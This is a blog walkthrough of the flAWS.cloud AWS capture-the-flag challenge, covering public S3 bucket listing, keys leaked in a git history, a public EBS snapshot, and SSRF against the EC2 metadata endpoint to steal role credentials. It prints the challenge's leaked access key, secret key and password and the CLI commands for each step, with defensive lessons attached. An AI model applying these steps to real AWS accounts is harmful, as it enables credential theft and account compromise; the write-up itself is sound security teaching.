Skip to main content
Cybersecurity & DevOps projects | CTF Writeups
  1. Writeups/

flAWS Walkthrough – AWS S3, IAM, EC2, and Lambda Exploitation

·4 mins·
Arbaaz Jamadar
Author
Arbaaz Jamadar
Table of Contents

flAWS.cloud Walkthrough – Exploiting AWS Misconfigurations
#

flAWS.cloud is a hands-on CTF-style challenge created to teach cloud security professionals about real-world AWS misconfigurations and their potential exploitation. This walkthrough explains each step in detail, covering how attackers can enumerate, exploit, and escalate privileges inside AWS environments.

Pre-requisites
#

  1. AWS Account – Free tier is enough.
  2. AWS CLI – Install and configure with an IAM user (never use root).
  3. IAM User – With policies to create/manage S3, EC2, and IAM.
  4. Git – Required to fetch repos and explore leaked commits.

Notes
#

  • The challenge is hosted in us-west-2.
  • Some tasks require a Linux environment.
  • Always cross-check AWS docs for S3, IAM, EC2, Lambda.
  • Make sure EBS volumes and EC2 instances are in the same region when mounting snapshots.
  • Contact me if you get stuck—I’d be happy to help!

Task 1 – Public S3 Bucket Enumeration
#

Without any credentials, we attempt to list the bucket:

aws s3 ls s3://flaws.cloud
  • Discovered secret-dd02c7c.html at:
http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html

  • Security Issue:

    • Public S3 bucket listing should never be enabled.

    • Exposes internal files to unauthenticated users.

Task 2 – Authenticated S3 Enumeration
#

  • Authenticated users with “All Authenticated AWS Users” permission can enumerate buckets:
aws s3 --profile default ls s3://level2-xxxx.flaws.cloud/

  • Discovered secret-e4443fc.html → leads to Task 3.

  • Security Issue:

    • Misconfigured ACL allows any AWS account to list objects.

Task 3 – Secrets in Git Repository on S3
#

  • We found a .git folder inside the bucket:
aws s3 sync s3://level3-xxxx.flaws.cloud/ .
git log
git checkout <commit-id>
  • Found AWS Access Keys inside access_key.txt:
access_key_id: AKIAJ366LIPB4IJKT7SA
secret_access_key: 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
  • Configured AWS CLI with the leaked creds:
aws configure --profile flaws
aws --profile flaws s3api list-buckets

  • Security Issue:

    • Never commit AWS keys to Git repos.

    • If leaked, revoke immediately and rotate.

Task 4 – Exploiting Public EC2 Snapshots
#

  • Discovered an EC2 snapshot linked to IAM user backup:
aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
  • Imported the snapshot into our account:
aws ec2 create-volume \
 --availability-zone us-west-2a \
 --region us-west-2 \
 --snapshot-id snap-0b49342abd1bdcb89
  • Mounted snapshot → found setupNginx.sh with plaintext creds:
username: flaws
password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

  • Logged into the hosted website successfully.

  • Security Issue:

    • EC2 snapshots should always be private.

    • Public snapshots expose sensitive data & credentials.

Task 5 – Exploiting EC2 Metadata via SSRF
#

  • The instance was exposing AWS Instance Metadata Service (IMDS) through /proxy:
http://<ec2-public-dns>/proxy/169.254.169.254/latest/meta-data
  • Extracted temporary IAM role credentials:
iam/security-credentials/flaws
  • Exported them and accessed:
aws s3 ls s3://level6-xxxx.flaws.cloud

  • Security Issue:

    • IMDS exposure enables SSRF → credential theft.

    • Applications should block access to 169.254.169.254.

Task 6 – Lambda Privilege Escalation via API Gateway
#

  • Checked IAM role & attached policies:
aws --profile sec iam list-attached-role-policies --role-name level6
aws --profile sec lambda list-functions
  • Found Lambda function Level6 and API Gateway ID s33ppypa75:
aws --profile sec apigateway get-stages --rest-api-id s33ppypa75

  • Stage: prod

    • Invoked Lambda via API Gateway:
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/prod/Level6
  • Response revealed the final endpoint:
http://theend-xxxx.flaws.cloud/d730aa2b/

Challenge Completed 🎉
#

  • Security Issue:

    • Over-permissive IAM policies + API Gateway integration can be abused to invoke internal Lambda functions.

    • Always enforce least privilege & review IAM policies.

Key Security Lessons
#

  • S3 Misconfiguration → Public listing exposes sensitive files.

  • Git Repo Secrets → Never commit credentials.

  • Public Snapshots → EC2/EBS volumes can leak private data.

  • IMDS Exposure → Protect against SSRF attacks.

  • IAM Over-Permissions → Leads to privilege escalation.

  • API Gateway + Lambda → Can be exploited if policies are too permissive.

Conclusion
#

The flAWS.cloud CTF is a perfect way to understand real-world AWS security pitfalls. It highlights how a single misconfiguration (like public S3 or IMDS exposure) can cascade into full account compromise.

Best Practices to Prevent Such Exploits:
#

  • Enforce least privilege IAM policies.

  • Disable public S3 access by default.

  • Regularly audit IAM, S3, EC2, Lambda configurations.

  • Use tools like AWS Config, Security Hub, ScoutSuite.

  • Implement automated secret scanning for repos (e.g., GitLeaks, TruffleHog).

Related Reads: #

AWS IAM Security Best Practices

AWS S3 Security Guidelines

flAWS.cloud Challenge

Related

API Security Architect
·8 mins
DockerLab: Containerized ELK Stack for Log Analysis
·3 mins
IPv6 Vulnerabiltiy
·6 mins